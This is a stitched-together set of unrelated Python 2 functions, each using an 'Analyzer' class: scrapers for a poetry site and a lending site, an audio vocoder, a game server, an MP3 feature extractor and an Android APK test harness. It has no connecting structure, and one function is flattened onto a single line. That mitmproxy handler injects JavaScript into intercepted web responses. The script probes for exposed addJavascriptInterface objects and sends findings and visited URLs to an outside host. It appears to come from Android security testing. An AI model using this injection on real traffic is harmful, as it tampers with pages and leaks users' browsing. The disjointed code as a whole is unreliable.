    analyzer = Analyzer(lexicons.get(json["language"].lower(), lexicons["english"]),
                        json["language"])
    games[json["gid"]] = Game(json["gid"],
                              GameProperties(min_letters=json["minLetters"],
                                             minutes=json["minutes"]),
                              grid, analyzer, send_game_update,
                              list_request_callback, send_analysis_callback)
    socketio.emit("game_list_update",
                  {gid: (g.encode()) for gid, g in games.items()},
                  room="lobby")
def infomation_crew(self):
    # process records one at a time
    total_count = 20000
    i = 0
    while i < total_count:
        i += 1
        # get the detail-page url of the next unanalyzed poem
        info = self.db.select_unanalyzed_infomation()
        if info is not None:
            # download and analyze
            url = info['url']
            html = Downloader.get_html(url, 'infomation')
            if html:
                content = Analyzer.get_info_detail(html)
                if content:
                    self.db.update_infomationurl(url, content)
                    print '%d/%d %s %s' % (i, total_count, info['title'], url)
                else:
                    self.db.insert_error('analyze_info_detail_error', 7, 'reason', url)
            else:
                self.db.insert_error('download_info_detail_error', 6, 'reason', url)
        else:
            # nothing left to process
            return
class Processor(object):
    def __init__(self, datafile='data.txt', statsNum=3):
        self.analyzer = Analyzer()
        self.classificator = Classificator()
        self.datafile = datafile
        self.statsNum = statsNum

    def writeStats(self, files):
        datafile = open(self.datafile, 'w')
        for file in files:
            ffts = self.analyzer.getFFTs(file)
            stats = self.analyzer.getStats(ffts)
            datafile.write(' '.join(str(x) for x in stats) + '\n')
        datafile.close()

    def normalize(self, data):
        transposed = data.transpose()
        meanVal = 1
        for i in range(len(transposed)):
            if i % self.statsNum == 0:
                meanVal = np.mean(transposed[i])
            transposed[i] /= meanVal
        data = transposed.transpose()
        return data

    def cluster(self, files, clustersNum):
        self.writeStats(files)
        datafile = open(self.datafile)
        data = datafile.read().split('\n')
        data = np.array([[float(x) for x in row.split(' ')] for row in data[:-1]])
        data = self.normalize(data)
        net = self.classificator.newnet(clustersNum)
        net.train(data, epochs=500)
        result = net.sim(data)
        self.classificator.savenet(net)
        return self.classificator.getGroupedResult(result)

    def classify(self, file):
        ffts = self.analyzer.getFFTs(file)
        stats = self.analyzer.getStats(ffts)
        net = self.classificator.loadnet()
        return net.sim(stats)
def __init__(self, automaton):
    self.exps = []
    self.automaton = automaton
    self.simulation = Simulation(automaton, False)
    self.analyzer = Analyzer(automaton)
    self.repeat = 1.0
    self.simulation.DEBUG_ITERATIONS = -1
    self.directory = "exps"
    self.log = False
def poem_list_crew(self):
    for i in range(1, 6):
        url = 'http://www.haoshiwen.org/type.php?x=%d' % i
        content = Downloader.get_html(url, 'poemlist')
        if content:
            page_count = Analyzer.get_page_count(content)  # analyze the page count
            for j in range(1, page_count + 1):
                page_url = 'http://www.haoshiwen.org/type.php?x=%d&page=%d' % (i, j)
                # store the url
                self.db.insert_url(page_url, 1)
                # check whether it has already been analyzed
                if self.db.url_analyzed(page_url):
                    pass
                else:
                    content = Downloader.get_html(page_url, 'poemlist')
                    if content:
                        # analyze the poem list
                        poems = Analyzer.get_poems_from_list_page(content)
                        if poems:
                            # store the poems
                            self.db.insert_urls(poems, 2)
                            self.db.update_url(page_url)
                            print '%d %d/%d: %s' % (i, j, page_count, page_url)
                        else:
                            if Analyzer.check_poem_list_last_page(content):
                                # last page
                                break
                            else:
                                print 'Failed to analyze the poem list'
                                self.db.insert_error('analyze_poem_list_error', 3, 'reason', page_url)
                                # log error: analyze_poem_list_error
                    else:
                        print 'Failed to fetch the poem list page'
                        self.db.insert_error('get_poem_list_error', 2, 'reason', page_url)
                        # log error: get_poem_list_error
        else:
            print 'Failed to analyze the first page'
            self.db.insert_error('analyze_poem_list_first_page_error', 1, 'reason', page_url)
def record_and_play_audio():
    record_seconds = 5
    fs = 44100
    p = pyaudio.PyAudio()
    odata = np.zeros(fs * record_seconds)

    print "Recording audio for the next {0} seconds".format(record_seconds)
    record_audio(odata, p, fs, record_seconds)
    wavio.write("before.wav", 44100, odata)

    print "Audio has recorded, stand by for voice"
    play_audio(odata, p, fs)

    print "Encoding and decoding voice through vocoder"
    analyzer = Analyzer(odata, 10e-3)
    lpc_frame_array = analyzer.encode()
    synthesizer = Synthesizer(lpc_frame_array)
    reconstructed_signal = synthesizer.decode()
    wavio.write("test.wav", 44100, reconstructed_signal)

    print "Playing reconstructed audio"
    play_audio(reconstructed_signal, p, fs)
    p.terminate()
def user_crawl(self, user_id):
    html = self.server.get_user_info(user_id)
    if html:
        user_info = Analyzer.get_user_info(html)
        if user_info:
            # store in the database
            self.db.insert_use_info(user_info)
        else:
            Logger.error(1, "Failed to parse user data")
    else:
        Logger.error(1, "Failed to download user data")
def get_loan_list(url, cache, use_cookie=False):
    """ Fetch the loan list; returns a list. """
    domain = PaipaiDai.get_domain(url)
    data, cache = Server.get(url, cache=cache, use_cookie=use_cookie)
    if data:
        data, next_page = Analyzer.get_loan_list(data)
        if next_page:
            next_page = os.path.join(domain, next_page.lstrip('/'))
        return data, next_page, cache
    return [], None, False
def __init__(self):
    self.get_apk_from_manager()
    self.trigger = Trigger.get_trigger_for(self.get_filter_tag(),
                                           self.get_package_name(),
                                           self.get_description())
    self.reporter = Reporter.get_reporter_for(self.get_filter_tag(),
                                              self.get_package_name(),
                                              self.get_description())
    self.analyzer = Analyzer.get_analyzer_for(self.get_filter_tag(),
                                              self.get_package_name(),
                                              self.get_description())
    self.emulator = Emulator.get_emulator_for(self.get_filter_tag(),
                                              self.get_package_name(),
                                              self.get_description())
    self.error_queue = multiprocessing.Queue()
    self.setup_device()
def handle_response(self, flow): print "request path is %s " % flow.request.path # If it's injectable and it's not the injected request requested_site = flow.request.headers["Host"][0] if flow.request.scheme.endswith("http") and requested_site.find("www.fundacionsadosky.org.ar") == -1: visited_url = base64.b64encode(requested_site + flow.request.path) #taken from www.droidsec.org/tests/addjsif/ script = '''vulnerable=[];for(i in top){el=top[i];if(el==null){continue};if(typeof(el)==='function'){continue}try{top[i].getClass().forName('java.lang.Runtime');vulnerable.push(i)}catch(e){}}if(vulnerable.length>0){var request=new XMLHttpRequest();request.open("GET","http://www.fundacionsadosky.org.ar/?vulnerable_javascript_injection=true&interface="+vulnerable.join()+"&url=''' + visited_url + '''",true);request.onreadystatechange=function(){};request.send()}''' content_type = flow.response.headers.get("Content-Type") if not content_type: content_type = flow.response.headers.get("Content-type") if content_type and "text/html" in content_type[0]: with decoded(flow.response): # automatically decode gzipped responses. if flow.response.content: try: response = flow.response.content print "Response is "+response root = lxml.html.fromstring(response) if root.find('.//*') is not None: print "TRIED MODIFYING /html " + requested_site+ flow.request.path # is HTML, use lxml to insert to head, body or script append_in = root.find('.//head') if append_in is None: append_in = root.find('.//body') elif append_in is None: append_in = root.find('.//script').getparent() else: append_in = root script = lxml.html.fromstring('<script>' + script + '</script>') if append_in is not None: append_in.append(script) flow.response.content = lxml.html.tostring(root) except: print "There was a problem parsing the html response, skip it" # mimetype may be application/javascript or text/javascript elif content_type and "javascript" in content_type[0]: with decoded(flow.response): # automatically decode gzipped responses. print "TRIED MODIFYING /javascript " + requested_site + flow.request.path # is searching for library .JS (both cases sensitive) or JQUERY flow.response.content = script.encode("utf-8") + flow.response.content Analyzer.handle_response(self,flow)
def poem_type_poem_list_craw(self):
    types = self.db.get_poem_types()
    for i in types:
        j = 1
        while True:
            page_url = i['url'] + "&page=" + str(j)
            # store the url
            self.db.insert_url(page_url, 3)
            # check whether it has already been analyzed
            if self.db.url_analyzed(page_url):
                j += 1
                continue
            else:
                content = Downloader.get_html(page_url, 'poemlist')
                if content:
                    # analyze the poem list
                    poems = Analyzer.get_poems_from_list_page(content)
                    if poems:
                        # store the poems
                        self.db.insert_type_poems(i['id'], poems)
                        self.db.update_url(page_url)
                        print '%d: %s' % (j, page_url)
                        j += 1
                    else:
                        if Analyzer.check_poem_list_last_page(content):
                            # last page
                            break
                        else:
                            print 'Failed to analyze the poem list'
                            self.db.insert_error('analyze_poem_list_error', 3, 'reason', page_url)
                            # log error: analyze_poem_list_error
                else:
                    print 'Failed to fetch the poem list page'
                    self.db.insert_error('get_poem_list_error', 2, 'reason', page_url)
def poem_type_crew(self):
    url = 'http://www.haoshiwen.org/type.php'
    content = Downloader.get_html(url, 'poemlist')
    if content:
        result = Analyzer.get_poem_types(content)
        k = 1
        for i in result:
            # only handle the "type" category
            if i[0] == u'类型':
                for j in i[1]:
                    self.db.insert_poem_types(k, i[0], j[0], j[1])
                    print '\t' + j[0]
                    k += 1
def mp3_to_feature_vectors(self):
    # checks for and removes existing feature vector files
    os.chdir(outputpath)
    fileList = glob.glob("*.csv")
    for f in fileList:
        os.remove(f)

    # new generic Analyzer and dataflow
    theanalyzer = Analyzer(self.SAMPLERATE, self.featureList, True)
    df = theanalyzer.dataFlowCreator()

    failed_mp3 = []
    failed_dir = []
    i = 0
    for path in self.mp3dirs:
        logging.info("Changed path: %s" % (path))
        for dirpath, dirnames, filenames in os.walk(path):
            for filename in [f for f in filenames if f.endswith(".mp3")]:
                os.chdir(dirpath)
                if theanalyzer.process_mp3(filename, df) == False:
                    failed_mp3.append(filename)
                i += 1
    os.chdir(syspath)
    print "wrote %d files." % i
def __get_buy_loans2(self, url):
    domain = PaipaiDai.get_domain(url)
    content, cache = Server.get(url, cache=False, use_cookie=True)
    if content:
        my_loans, next_page = Analyzer.get_my_loan_list(content)
        self.db.insert_my_loans(my_loans)
        print url
        if next_page:
            if not cache:
                time.sleep(2)
            next_page = os.path.join(domain, next_page.lstrip('/'))
            self.__get_buy_loans2(next_page)
    else:
        time.sleep(2)